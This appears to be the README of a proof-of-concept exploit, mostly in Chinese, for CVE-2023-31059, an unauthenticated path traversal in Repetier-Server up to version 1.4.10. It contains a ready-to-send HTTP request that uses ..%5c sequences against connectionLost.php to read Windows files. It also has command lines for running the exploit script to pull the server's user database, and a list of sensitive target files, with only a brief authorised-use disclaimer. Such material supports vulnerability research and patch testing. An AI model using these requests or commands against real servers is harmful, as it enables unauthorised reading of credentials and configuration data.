
Proof-of-concept exploit for CVE-2023-31059, an unauthenticated path traversal in Repetier-Server ≤1.4.10, enabling arbitrary file read via crafted HTTP requests.
作者: Mohammed Idrees Banyamer
角色: 安全研究员
国家: 约旦 🇯🇴
针对 Repetier‑Server ≤ 1.4.10 中未经认证的远程路径遍历 / LFI 漏洞的概念验证利用。
该漏洞允许通过 connectionLost.php 端点中的精心构造的 ..%5c 序列实现任意文件读取。
| 字段 | 值 |
|---|---|
| 产品 | Repetier‑Server |
| 影响版本 | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| 类型 | 路径遍历 / LFI |
| 认证 | 无 |
| 攻击向量 | 网络 |
| 影响 | 任意文件读取 |
| CVSS | 9.8 严重 |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| A
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
本 PoC 仅供教育和授权的安全测试目的使用。
请仅在你拥有或明确许可的系统上使用。
GitHub: https://github.com/mbanyamer